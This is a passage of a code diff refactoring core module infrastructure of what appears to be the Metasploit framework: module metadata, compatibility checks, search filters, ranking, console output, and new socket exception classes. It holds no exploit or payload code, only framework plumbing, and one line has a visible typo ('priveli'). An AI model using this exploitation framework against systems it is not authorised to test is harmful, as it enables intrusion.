def rport
datastore['RPORT']
end
#
# The including module override these methods
# The including module may override some of these methods
#
# Called for each IP in the batch
# Builds and returns the probe to be sent
def build_probe
end
# Called for each IP in the batch. This will send all necessary probes.
def scan_host(ip)
scanner_send(build_probe, ip, rport)
end
# Called for each response packet
@ -169,11 +186,12 @@ module Auxiliary::UDPScanner
# Called before the scan block
def scanner_prescan(batch)
vprint_status("Sending probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")
@results = {}
end
# Called after the scan block
def scanner_postscan(batch)
end
end
end

3
lib/msf/core/db_manager/import.rb
View File

@ -302,6 +302,9 @@ module Msf::DBManager::Import
when /MetasploitV4/
@import_filedata[:type] = "Metasploit XML"
return :msf_xml
when /MetasploitV5/
@import_filedata[:type] = "Metasploit XML"
return :msf_xml
when /netsparker/
@import_filedata[:type] = "NetSparker XML"
return :netsparker_xml

4
lib/msf/core/encoder.rb
View File

@ -162,14 +162,14 @@ class Encoder < Module
# Returns MODULE_ENCODER to indicate that this is an encoder module.
#
def self.type
return MODULE_ENCODER
return Msf::MODULE_ENCODER
end
#
# Returns MODULE_ENCODER to indicate that this is an encoder module.
#
def type
return MODULE_ENCODER
return Msf::MODULE_ENCODER
end
#

4
lib/msf/core/exploit.rb
View File

@ -621,14 +621,14 @@ class Exploit < Msf::Module
# Returns MODULE_EXPLOIT to indicate that this is an exploit module.
#
def self.type
MODULE_EXPLOIT
Msf::MODULE_EXPLOIT
end
#
# Returns MODULE_EXPLOIT to indicate that this is an exploit module.
#
def type
MODULE_EXPLOIT
Msf::MODULE_EXPLOIT
end
#

2
lib/msf/core/exploit/http/server.rb
View File

@ -476,7 +476,7 @@ module Exploit::Remote::HttpServer
host = "[#{host}]"
end
if datastore['URIPORT']
if datastore['URIPORT'] != 0
port = ':' + datastore['URIPORT'].to_s
elsif (ssl and datastore["SRVPORT"] == 443)
port = ''

2
lib/msf/core/framework.rb
View File

@ -69,7 +69,7 @@ class Framework
def initialize(opts={})
# Allow specific module types to be loaded
types = opts[:module_types] || MODULE_TYPES
types = opts[:module_types] || Msf::MODULE_TYPES
self.threads = ThreadManager.new(self)
self.events = EventDispatcher.new(self)

983
lib/msf/core/module.rb
View File

File diff suppressed because it is too large Load Diff

46
lib/msf/core/module/arch.rb Normal file
View File

@ -0,0 +1,46 @@
module Msf::Module::Arch
#
# Attributes
#
# @!attribute arch
# The array of zero or more architectures.
attr_reader :arch
#
# Instance Methods
#
#
# Return whether or not the module supports the supplied architecture.
#
def arch?(what)
if (what == ARCH_ANY)
true
else
arch.index(what) != nil
end
end
#
# Return a comma separated list of supported architectures, if any.
#
def arch_to_s
arch.join(", ")
end
#
# Enumerate each architecture.
#
def each_arch(&block)
arch.each(&block)
end
protected
#
# Attributes
#
attr_writer :arch
end

153
lib/msf/core/module/author.rb
View File

@ -1,149 +1,36 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Module::Author
#
# Attributes
#
###
#
# This data type represents an author of a piece of code in either
# the framework, a module, a script, or something entirely unrelated.
#
###
class Msf::Module::Author
# A hash of known author names
Known =
{
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
'anonymous' => 'Unknown',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
'et' => 'et' + 0x40.chr + 'metasploit.com',
'Christian Mehlmauer' => 'FireFart' + 0x40.chr + 'gmail.com',
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
'joev' => 'joev' + 0x40.chr + 'metasploit.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
'Ben Campbell' => 'eat_meatballs' + 0x40.chr + 'hotmail.co.uk',
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'wvu' => 'wvu' + 0x40.chr + 'metasploit.com'
}
# @!attribute author
# The array of zero or more authors.
attr_reader :author
#
# Class method that translates a string to an instance of the Author class,
# if it's of the right format, and returns the Author class instance
# Instance Methods
#
def self.from_s(str)
instance = self.new
# If the serialization fails...
if (instance.from_s(str) == false)
return nil
end
return instance
#
# Return a comma separated list of author for this module.
#
def author_to_s
author.collect { |author| author.to_s }.join(", ")
end
#
# Transforms the supplied source into an array of authors
# Enumerate each author.
#
def self.transform(src)
Rex::Transformer.transform(src, Array, [ self ], 'Author')
def each_author(&block)
author.each(&block)
end
def initialize(name = nil, email = nil)
self.name = name
self.email = email || Known[name]
end
protected
#
# Compares authors
# Attributes
#
def ==(tgt)
return (tgt.to_s == to_s)
end
#
# Serialize the author object to a string in form:
#
# name <email>
#
def to_s
str = "#{name}"
if (email and not email.empty?)
str += " <#{email}>"
end
return str
end
#
# Translate the author from the supplied string which may
# have either just a name or also an email address
#
def from_s(str)
# Supported formats:
# known_name
# user [at/@] host [dot/.] tld
# Name <user [at/@] host [dot/.] tld>
if ((m = str.match(/^\s*([^<]+)<([^>]+)>\s*$/)))
self.name = m[1].sub(/<.*/, '')
self.email = m[2].sub(/\s*\[at\]\s*/, '@').sub(/\s*\[dot\]\s*/, '.')
else
if (Known[str])
self.email = Known[str]
self.name = str
else
self.email = str.sub(/\s*\[at\]\s*/, '@').sub(/\s*\[dot\]\s*/, '.').gsub(/^<|>$/, '')
m = self.email.match(/([^@]+)@/)
self.name = m ? m[1] : nil
if !(self.email and self.email.index('@'))
self.name = self.email
self.email = ''
end
end
end
self.name.strip! if self.name
return true
end
#
# Sets the name of the author and updates the email if it's a known author.
#
def name=(name)
self.email = Known[name] if (Known[name])
@name = name
end
attr_accessor :email
attr_reader :name
# @!attribute [w] author
attr_writer :author
end

115
lib/msf/core/module/compatibility.rb Normal file
View File

@ -0,0 +1,115 @@
module Msf::Module::Compatibility
#
# Returns the hash that describes this module's compatibilities.
#
def compat
module_info['Compat'] || {}
end
#
# Returns whether or not this module is compatible with the supplied
# module.
#
def compatible?(mod)
ch = nil
# Invalid module? Shoot, we can't compare that.
return true if (mod == nil)
# Determine which hash to used based on the supplied module type
if (mod.type == Msf::MODULE_ENCODER)
ch = self.compat['Encoder']
elsif (mod.type == Msf::MODULE_NOP)
ch = self.compat['Nop']
elsif (mod.type == Msf::MODULE_PAYLOAD)
ch = self.compat['Payload']
if self.respond_to?("target") and self.target and self.target['Payload'] and self.target['Payload']['Compat']
ch = ch.merge(self.target['Payload']['Compat'])
end
else
return true
end
# Enumerate each compatibility item in our hash to find out
# if we're compatible with this sucker.
ch.each_pair do |k,v|
# Get the value of the current key from the module, such as
# the ConnectionType for a stager (ws2ord, for instance).
mval = mod.module_info[k]
# Reject a filled compat item on one side, but not the other
if (v and not mval)
dlog("Module #{mod.refname} is incompatible with #{self.refname} for #{k}: limiter was #{v}")
return false
end
# Track how many of our values matched the module
mcnt = 0
# Values are whitespace separated
sv = v.split(/\s+/)
mv = mval.split(/\s+/)
sv.each do |x|
dlog("Checking compat [#{mod.refname} with #{self.refname}]: #{x} to #{mv.join(", ")}", 'core', LEV_3)
# Verify that any negate values are not matched
if (x[0,1] == '-' and mv.include?(x[1, x.length-1]))
dlog("Module #{mod.refname} is incompatible with #{self.refname} for #{k}: limiter was #{x}, value was #{mval}", 'core', LEV_1)
return false
end
mcnt += 1 if mv.include?(x)
end
# No values matched, reject this module
if (mcnt == 0)
dlog("Module #{mod.refname} is incompatible with #{self.refname} for #{k}: limiter was #{v}, value was #{mval}", 'core', LEV_1)
return false
end
end
dlog("Module #{mod.refname} is compatible with #{self.refname}", "core", LEV_1)
# If we get here, we're compatible.
return true
end
protected
#
# This method initializes the module's compatibility hashes by normalizing
# them into one single hash. As it stands, modules can define
# compatibility in their supplied info hash through:
#
# Compat:: direct compat definitions
# PayloadCompat:: payload compatibilities
# EncoderCompat:: encoder compatibilities
# NopCompat:: nop compatibilities
#
# In the end, the module specific compatibilities are merged as sub-hashes
# of the primary Compat hash key to make checks more uniform.
#
def init_compat
c = module_info['Compat']
if (c == nil)
c = module_info['Compat'] = Hash.new
end
# Initialize the module sub compatibilities
c['Payload'] = Hash.new if (c['Payload'] == nil)
c['Encoder'] = Hash.new if (c['Encoder'] == nil)
c['Nop'] = Hash.new if (c['Nop'] == nil)
# Update the compat-derived module specific compatibilities from
# the specific ones to make a uniform view of compatibilities
c['Payload'].update(module_info['PayloadCompat'] || {})
c['Encoder'].update(module_info['EncoderCompat'] || {})
c['Nop'].update(module_info['NopCompat'] || {})
end
end

41
lib/msf/core/module/data_store.rb Normal file
View File

@ -0,0 +1,41 @@
module Msf::Module::DataStore
#
# Attributes
#
# @attribute [r] datastore
# The module-specific datastore instance.
#
# @return [Hash{String => String}]
attr_reader :datastore
#
# Imports default options into the module's datastore, optionally clearing
# all of the values currently set in the datastore.
#
def import_defaults(clear_datastore = true)
# Clear the datastore if the caller asked us to
self.datastore.clear if clear_datastore
self.datastore.import_options(self.options, 'self', true)
# If there are default options, import their values into the datastore
if (module_info['DefaultOptions'])
self.datastore.import_options_from_hash(module_info['DefaultOptions'], true, 'self')
end
end
#
# Overrides the class' own datastore with the one supplied. This is used
# to allow modules to share datastores, such as a payload sharing an
# exploit module's datastore.
#
def share_datastore(ds)
self.datastore = ds
self.datastore.import_options(self.options)
end
protected
attr_writer :datastore
end

41
lib/msf/core/module/failure.rb Normal file
View File

@ -0,0 +1,41 @@
# Constants indicating the reason for an unsuccessful module attempt
module Msf::Module::Failure
# The exploit settings were incorrect
BadConfig = 'bad-config'
# The network service disconnected us mid-attempt
Disconnected = 'disconnected'
# The application replied indication we do not have access
NoAccess = 'no-access'
# No confidence in success or failure
None = 'none'
# The target is not compatible with this exploit or settings
NoTarget = 'no-target'
# The application endpoint or specific service was not found
NotFound = 'not-found'
# The application response indicated it was not vulnerable
NotVulnerable = 'not-vulnerable'
# The payload was delivered but no session was opened (AV, network, etc)
PayloadFailed = 'payload-failed'
# The exploit triggered some form of timeout
TimeoutExpired = 'timeout-expired'
# The application replied in an unexpected fashion
UnexpectedReply = 'unexpected-reply'
# No confidence in success or failure
Unknown = 'unknown'
# The network service was unreachable (connection refused, etc)
Unreachable = 'unreachable'
# The exploit was interrupted by the user
UserInterrupt = 'user-interrupt'
end

67
lib/msf/core/module/full_name.rb Normal file
View File

@ -0,0 +1,67 @@
# @note {Msf::Module::ModuleInfo#name} is unrelated to {#fullname} and should instead be thought of as the title or
# summary of the module.
#
# Names related to {#fullname}, such as {#fullname}, {#refname}, and {#shortname}.
module Msf::Module::FullName
extend ActiveSupport::Concern
module ClassMethods
#
# Attributes
#
# @attribute refname
# The module's name that is assigned it it by the framework
# or derived from the path that the module is loaded from.
attr_accessor :refname
#
# Class Methods
#
def fullname
type + '/' + refname
end
def shortname
refname.split('/').last
end
end
#
# Instance Methods
#
#
# Returns the module's framework full reference name. This is the
# short name that end-users work with (refname) plus the type
# of module prepended. Ex:
#
# payloads/windows/shell/reverse_tcp
#
def fullname
self.class.fullname
end
#
# Returns the module's framework reference name. This is the
# short name that end-users work with. Ex:
#
# windows/shell/reverse_tcp
#
def refname
self.class.refname
end
#
# Returns the module's framework short name. This is a
# possibly conflicting name used for things like console
# prompts.
#
# reverse_tcp
#
def shortname
self.class.shortname
end
end

220
lib/msf/core/module/module_info.rb Normal file
View File

@ -0,0 +1,220 @@
module Msf::Module::ModuleInfo
#
# CONSTANTS
#
# The list of options that support merging in an information hash.
UpdateableOptions = [ "Name", "Description", "Alias", "PayloadCompat" ]
#
# Instance Methods
#
#
# Returns the module's alias, if it has one. Otherwise, the module's
# name is returned.
#
def alias
module_info['Alias']
end
#
# Return the module's description.
#
def description
module_info['Description']
end
#
# Returns the disclosure date, if known.
#
def disclosure_date
date_str = Date.parse(module_info['DisclosureDate'].to_s) rescue nil
end
#
# Return the module's name from the module information hash.
#
def name
module_info['Name']
end
protected
#
# Attributes
#
# @!attribute module_info
attr_accessor :module_info
#
# Instance Methods
#
#
# Register options with a specific owning class.
#
def info_fixups
# Each reference should be an array consisting of two elements
refs = module_info['References']
if(refs and not refs.empty?)
refs.each_index do |i|
if !(refs[i].respond_to?('[]') and refs[i].length == 2)
refs[i] = nil
end
end
# Purge invalid references
refs.delete(nil)
end
end
#
# Checks and merges the supplied key/value pair in the supplied hash.
#
def merge_check_key(info, name, val)
if (self.respond_to?("merge_info_#{name.downcase}"))
eval("merge_info_#{name.downcase}(info, val)")
else
# If the info hash already has an entry for this name
if (info[name])
# If it's not an array, convert it to an array and merge the
# two
if (info[name].kind_of?(Array) == false)
curr = info[name]
info[name] = [ curr ]
end
# If the value being merged is an array, add each one
if (val.kind_of?(Array) == true)
val.each { |v|
if (info[name].include?(v) == false)
info[name] << v
end
}
# Otherwise just add the value
elsif (info[name].include?(val) == false)
info[name] << val
end
# Otherwise, just set the value equal if no current value
# exists
else
info[name] = val
end
end
end
#
# Merges options in the info hash in a sane fashion, as some options
# require special attention.
#
def merge_info(info, opts)
opts.each_pair { |name, val|
merge_check_key(info, name, val)
}
info
end
#
# Merges advanced options.
#
def merge_info_advanced_options(info, val)
merge_info_options(info, val, true, false)
end
#
# Merge aliases with an underscore delimiter.
#
def merge_info_alias(info, val)
merge_info_string(info, 'Alias', val, '_')
end
#
# Merges the module description.
#
def merge_info_description(info, val)
merge_info_string(info, 'Description', val, ". ", true)
end
#
# Merges advanced options.
#
def merge_info_evasion_options(info, val)
merge_info_options(info, val, false, true)
end
#
# Merges the module name.
#
def merge_info_name(info, val)
merge_info_string(info, 'Name', val, ', ', true)
end
#
# Merges options.
#
def merge_info_options(info, val, advanced = false, evasion = false)
key_name = ((advanced) ? 'Advanced' : (evasion) ? 'Evasion' : '') + 'Options'
new_cont = Msf::OptionContainer.new
new_cont.add_options(val, advanced, evasion)
cur_cont = Msf::OptionContainer.new
cur_cont.add_options(info[key_name] || [], advanced, evasion)
new_cont.each_option { |name, option|
next if (cur_cont.get(name))
info[key_name] = [] if (!info[key_name])
info[key_name] << option
}
end
#
# Merges a given key in the info hash with a delimiter.
#
def merge_info_string(info, key, val, delim = ', ', inverse = false)
if (info[key])
if (inverse == true)
info[key] = info[key] + delim + val
else
info[key] = val + delim + info[key]
end
else
info[key] = val
end
end
#
# Merge the module version.
#
def merge_info_version(info, val)
merge_info_string(info, 'Version', val)
end
#
# Updates information in the supplied info hash and merges other
# information. This method is used to override things like Name, Version,
# and Description without losing the ability to merge architectures,
# platforms, and options.
#
def update_info(info, opts)
opts.each_pair { |name, val|
# If the supplied option name is one of the ones that we should
# override by default
if (UpdateableOptions.include?(name) == true)
# Only if the entry is currently nil do we use our value
if (info[name] == nil)
info[name] = val
end
# Otherwise, perform the merge operation like normal
else
merge_check_key(info, name, val)
end
}
return info
end
end

28
lib/msf/core/module/module_store.rb Normal file
View File

@ -0,0 +1,28 @@
module Msf::Module::ModuleStore
#
# Attributes
#
#
# A generic hash used for passing additional information to modules
#
attr_accessor :module_store
#
# Instance Methods
#
#
# Read a value from the module store
#
def [](k)
self.module_store[k]
end
#
# Store a value into the module
#
def []=(k,v)
self.module_store[k] = v
end
end

32
lib/msf/core/module/network.rb Normal file
View File

@ -0,0 +1,32 @@
module Msf::Module::Network
#
# The default communication subsystem for this module. We may need to move
# this somewhere else.
#
def comm
Rex::Socket::Comm::Local
end
#
# Indicates whether the module supports IPv6. This is true by default,
# but certain modules require additional work to be compatible or are
# hardcoded in terms of application support and should be skipped.
#
def support_ipv6?
true
end
#
# Returns the address of the last target host (rough estimate)
#
def target_host
self.respond_to?('rhost') ? rhost : self.datastore['RHOST']
end
#
# Returns the address of the last target port (rough estimate)
#
def target_port
self.respond_to?('rport') ? rport : self.datastore['RPORT']
end
end

65
lib/msf/core/module/options.rb Normal file
View File

@ -0,0 +1,65 @@
# Register, deregister, and validate {#options}.
module Msf::Module::Options
#
# Attributes
#
# @attribute [r] options
# The module-specific options.
attr_reader :options
#
# Instance Methods
#
#
# This method ensures that the options associated with this module all
# have valid values according to each required option in the option
# container.
#
def validate
self.options.validate(self.datastore)
end
protected
#
# Removes the supplied options from the module's option container
# and data store.
#
def deregister_options(*names)
names.each { |name|
self.options.remove_option(name)
self.datastore.delete(name)
}
end
attr_writer :options
#
# Register advanced options with a specific owning class.
#
def register_advanced_options(options, owner = self.class)
self.options.add_advanced_options(options, owner)
self.datastore.import_options(self.options, 'self', true)
import_defaults(false)
end
#
# Register evasion options with a specific owning class.
#
def register_evasion_options(options, owner = self.class)
self.options.add_evasion_options(options, owner)
self.datastore.import_options(self.options, 'self', true)
import_defaults(false)
end
#
# Register options with a specific owning class.
#
def register_options(options, owner = self.class)
self.options.add_options(options, owner)
self.datastore.import_options(self.options, 'self', true)
import_defaults(false)
end
end

29
lib/msf/core/module/privileged.rb Normal file
View File

@ -0,0 +1,29 @@
module Msf::Module::Privileged
#
# Attributes
#
# @!attribute [r] privileged
# Whether or not this module requires privileged access.
attr_reader :privileged
#
# Instance Methods
#
#
# Returns whether or not the module requires or grants high privileges.
#
def privileged?
privileged == true
end
protected
#
# Attributes
#
# @!attribute [w] privileged
attr_writer :priveli
end

51
lib/msf/core/module/ranking.rb Normal file
View File

@ -0,0 +1,51 @@
module Msf::Module::Ranking
extend ActiveSupport::Concern
module ClassMethods
#
# Returns this module's ranking.
#
def rank
(const_defined?('Rank')) ? const_get('Rank') : Msf::NormalRanking
end
#
# Returns this module's ranking as a string for display.
#
def rank_to_h
rank_to_s.gsub('Rank', '').downcase
end
#
# Returns this module's ranking as a string representation.
#
def rank_to_s
Msf::RankingName[rank]
end
end
#
# Instance Methods
#
#
# Returns the module's rank.
#
def rank
self.class.rank
end
#
# Returns the module's rank in display format.
#
def rank_to_h
self.class.rank_to_h
end
#
# Returns the module's rank in string format.
#
def rank_to_s
self.class.rank_to_s
end
end

109
lib/msf/core/module/search.rb Normal file
View File

@ -0,0 +1,109 @@
module Msf::Module::Search
#
# This provides a standard set of search filters for every module.
# The search terms are in the form of:
# {
# "text" => [ [ "include_term1", "include_term2", ...], [ "exclude_term1", "exclude_term2"], ... ],
# "cve" => [ [ "include_term1", "include_term2", ...], [ "exclude_term1", "exclude_term2"], ... ]
# }
#
# Returns true on no match, false on match
#
def search_filter(search_string)
return false if not search_string
search_string += " "
# Split search terms by space, but allow quoted strings
terms = search_string.split(/\"/).collect{|t| t.strip==t ? t : t.split(' ')}.flatten
terms.delete('')
# All terms are either included or excluded
res = {}
terms.each do |t|
f,v = t.split(":", 2)
if not v
v = f
f = 'text'
end
next if v.length == 0
f.downcase!
v.downcase!
res[f] ||=[ [], [] ]
if v[0,1] == "-"
next if v.length == 1
res[f][1] << v[1,v.length-1]
else
res[f][0] << v
end
end
k = res
refs = self.references.map{|x| [x.ctx_id, x.ctx_val].join("-") }
is_server = (self.respond_to?(:stance) and self.stance == "aggressive")
is_client = (self.respond_to?(:stance) and self.stance == "passive")
[0,1].each do |mode|
match = false
k.keys.each do |t|
next if k[t][mode].length == 0
k[t][mode].each do |w|
# Reset the match flag for each keyword for inclusive search
match = false if mode == 0
# Convert into a case-insensitive regex
r = Regexp.new(Regexp.escape(w), true)
case t
when 'text'
terms = [self.name, self.fullname, self.description] + refs + self.author.map{|x| x.to_s}
if self.respond_to?(:targets) and self.targets
terms = terms + self.targets.map{|x| x.name}
end
match = [t,w] if terms.any? { |x| x =~ r }
when 'name'
match = [t,w] if self.name =~ r
when 'path'
match = [t,w] if self.fullname =~ r
when 'author'
match = [t,w] if self.author.map{|x| x.to_s}.any? { |a| a =~ r }
when 'os', 'platform'
match = [t,w] if self.platform_to_s =~ r or self.arch_to_s =~ r
if not match and self.respond_to?(:targets) and self.targets
match = [t,w] if self.targets.map{|x| x.name}.any? { |t| t =~ r }
end
when 'port'
match = [t,w] if self.datastore['RPORT'].to_s =~ r
when 'type'
match = [t,w] if Msf::MODULE_TYPES.any? { |modt| w == modt and self.type == modt }
when 'app'
match = [t,w] if (w == "server" and is_server)
match = [t,w] if (w == "client" and is_client)
when 'cve'
match = [t,w] if refs.any? { |ref| ref =~ /^cve\-/i and ref =~ r }
when 'bid'
match = [t,w] if refs.any? { |ref| ref =~ /^bid\-/i and ref =~ r }
when 'osvdb'
match = [t,w] if refs.any? { |ref| ref =~ /^osvdb\-/i and ref =~ r }
when 'edb'
match = [t,w] if refs.any? { |ref| ref =~ /^edb\-/i and ref =~ r }
end
break if match
end
# Filter this module if no matches for a given keyword type
if mode == 0 and not match
return true
end
end
# Filter this module if we matched an exclusion keyword (-value)
if mode == 1 and match
return true
end
end
false
end
end

65
lib/msf/core/module/type.rb Normal file
View File

@ -0,0 +1,65 @@
module Msf::Module::Type
extend ActiveSupport::Concern
module ClassMethods
#
# Class method to figure out what type of module this is
#
def type
raise NotImplementedError
end
end
#
# Instance Methods
#
#
# Returns true if this module is an auxiliary module.
#
def auxiliary?
(type == Msf::MODULE_AUX)
end
#
# Returns true if this module is an encoder module.
#
def encoder?
(type == Msf::MODULE_ENCODER)
end
#
# Returns true if this module is an exploit module.
#
def exploit?
(type == Msf::MODULE_EXPLOIT)
end
#
# Returns true if this module is a nop module.
#
def nop?
(type == Msf::MODULE_NOP)
end
#
# Returns true if this module is a payload module.
#
def payload?
(type == Msf::MODULE_PAYLOAD)
end
#
# Returns true if this module is an post-exploitation module.
#
def post?
(type == Msf::MODULE_POST)
end
#
# Return the module's abstract type.
#
def type
raise NotImplementedError
end
end

16
lib/msf/core/module/ui.rb Normal file
View File

@ -0,0 +1,16 @@
module Msf::Module::UI
autoload :Line, 'msf/core/module/ui/line'
autoload :Message, 'msf/core/module/ui/message'
# Modules can subscribe to a user-interface, and as such they include the
# UI subscriber module. This provides methods like print, print_line, etc.
# User interfaces are designed to be medium independent, and as such the
# user interface subscribes are designed to provide a flexible way of
# interacting with the user, n stuff.
include Rex::Ui::Subscriber
# Overwrite the {Rex::UI::Subscriber#print_line} to do custom prefixes
include Msf::Module::UI::Line
# Overwrite the {Rex::Ui::Subscriber} print_(status|error|good) to do time stamps
include Msf::Module::UI::Message
end

13
lib/msf/core/module/ui/line.rb Normal file
View File

@ -0,0 +1,13 @@
module Msf::Module::UI::Line
autoload :Verbose, 'msf/core/module/ui/line/verbose'
include Msf::Module::UI::Line::Verbose
def print_line(msg='')
super(print_line_prefix + msg)
end
def print_line_prefix
datastore['CustomPrintPrefix'] || framework.datastore['CustomPrintPrefix'] || ''
end
end

6
lib/msf/core/module/ui/line/verbose.rb Normal file
View File

@ -0,0 +1,6 @@
module Msf::Module::UI::Line::Verbose
# Verbose version of #print_line
def vprint_line(msg)
print_line(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
end
end

40
lib/msf/core/module/ui/message.rb Normal file
View File

@ -0,0 +1,40 @@
# Methods for print messages with status indicators
module Msf::Module::UI::Message
autoload :Verbose, 'msf/core/module/ui/message/verbose'
include Msf::Module::UI::Message::Verbose
def print_error(msg='')
super(print_prefix + msg)
end
def print_good(msg='')
super(print_prefix + msg)
end
def print_prefix
ret = ''
if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || (
framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i
)
prefix = "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] "
xn ||= datastore['ExploitNumber']
xn ||= framework.datastore['ExploitNumber']
if xn.is_a?(Fixnum)
prefix << "[%04d] " % xn
end
ret = prefix
end
ret
end
def print_status(msg='')
super(print_prefix + msg)
end
def print_warning(msg='')
super(print_prefix + msg)
end
end

26
lib/msf/core/module/ui/message/verbose.rb Normal file
View File

@ -0,0 +1,26 @@
module Msf::Module::UI::Message::Verbose
# Verbose version of #print_debug
def vprint_debug(msg)
print_debug(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
end
# Verbose version of #print_error
def vprint_error(msg)
print_error(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
end
# Verbose version of #print_good
def vprint_good(msg)
print_good(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
end
# Verbose version of #print_status
def vprint_status(msg)
print_status(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
end
# Verbose version of #print_warning
def vprint_warning(msg)
print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
end
end

27
lib/msf/core/module/uuid.rb Normal file
View File

@ -0,0 +1,27 @@
module Msf::Module::UUID
#
# Attributes
#
# @!attribute [r] uuid
# A unique identifier for this module instance
attr_reader :uuid
protected
#
# Attributes
#
# @!attribute [w] uuid
attr_writer :uuid
#
# Instance Methods
#
def generate_uuid
self.uuid = Rex::Text.rand_text_alphanumeric(8).downcase
end
end

4
lib/msf/core/nop.rb
View File

@ -14,14 +14,14 @@ class Nop < Msf::Module
# Returns MODULE_NOP to indicate that this is a NOP module.
#
def self.type
return MODULE_NOP
return Msf::MODULE_NOP
end
#
# Returns MODULE_NOP to indicate that this is a NOP module.
#
def type
return MODULE_NOP
return Msf::MODULE_NOP
end
#

4
lib/msf/core/payload.rb
View File

@ -102,14 +102,14 @@ class Payload < Msf::Module
# Returns MODULE_PAYLOAD to indicate that this is a payload module.
#
def self.type
return MODULE_PAYLOAD
return Msf::MODULE_PAYLOAD
end
#
# Returns MODULE_PAYLOAD to indicate that this is a payload module.
#
def type
return MODULE_PAYLOAD
return Msf::MODULE_PAYLOAD
end
#

2
lib/msf/core/payload_set.rb
View File

@ -21,7 +21,7 @@ class PayloadSet < ModuleSet
# set class that has custom handling for payloads.
#
def initialize
super(MODULE_PAYLOAD)
super(Msf::MODULE_PAYLOAD)
# A hash of each of the payload types that holds an array
# for all of the associated modules

1
lib/msf/core/platform.rb Normal file
View File

@ -0,0 +1 @@
Msf::Platform = Msf::Module::Platform

1
lib/msf/core/reference.rb Normal file
View File

@ -0,0 +1 @@
Msf::Reference = Msf::Module::Reference

1
lib/msf/core/site_reference.rb Normal file
View File

@ -0,0 +1 @@
Msf::SiteReference = Msf::Module::SiteReference

1
lib/msf/core/target.rb Normal file
View File

@ -0,0 +1 @@
Msf::Target = Msf::Module::Target

12
lib/msf/ui/console/command_dispatcher/core.rb
View File

@ -2355,17 +2355,17 @@ class Core
dispatcher = nil
case mod.type
when MODULE_ENCODER
when Msf::MODULE_ENCODER
dispatcher = Msf::Ui::Console::CommandDispatcher::Encoder
when MODULE_EXPLOIT
when Msf::MODULE_EXPLOIT
dispatcher = Msf::Ui::Console::CommandDispatcher::Exploit
when MODULE_NOP
when Msf::MODULE_NOP
dispatcher = Msf::Ui::Console::CommandDispatcher::Nop
when MODULE_PAYLOAD
when Msf::MODULE_PAYLOAD
dispatcher = Msf::Ui::Console::CommandDispatcher::Payload
when MODULE_AUX
when Msf::MODULE_AUX
dispatcher = Msf::Ui::Console::CommandDispatcher::Auxiliary
when MODULE_POST
when Msf::MODULE_POST
dispatcher = Msf::Ui::Console::CommandDispatcher::Post
else
print_error("Unsupported module type: #{mod.type}")

42
lib/rex/exceptions.rb
View File

@ -213,25 +213,57 @@ class ConnectionTimeout < ConnectionError
end
end
###
#
# This connection error is raised when an attempt is made to connect
# to a broadcast or network address.
#
###
class InvalidDestination < ConnectionError
include SocketError
include HostCommunicationError
def to_s
"The destination is invalid: #{addr_to_s}."
end
end
###
#
# This exception is raised when an attempt to use an address or port that is
# already in use occurs, such as binding to a host on a given port that is
# already in use. Note that Windows raises this in some cases when attempting
# to connect to addresses that it can't handle, e.g. "0.0.0.0". Thus, this is
# a ConnectionError.
# already in use or onot available occurs. such as binding to a host on a
# given port that is already in use, or when a bind address is specified that
# is not available to the host.
#
###
class BindFailed < ::ArgumentError
include SocketError
include HostCommunicationError
def to_s
"The address is already in use or unavailable: #{addr_to_s}."
end
end
##
#
# This exception is listed for backwards compatibility. We had been
# using AddressInUse as the exception for both bind errors and connection
# errors triggered by connection attempts to broadcast and network addresses.
# The two classes above have split this into their respective sources, but
# callers may still expect the old behavior.
#
##
class AddressInUse < ConnectionError
include SocketError
include HostCommunicationError
def to_s
"The address is already in use #{addr_to_s}."
"The address is already in use or unavailable: #{addr_to_s}."
end
end
###
#
# This exception is raised when an unsupported internet protocol is specified.

2
lib/rex/post/meterpreter/ui/console.rb
View File

@ -106,7 +106,7 @@ class Console
log_error("Operation timed out.")
rescue RequestError => info
log_error(info.to_s)
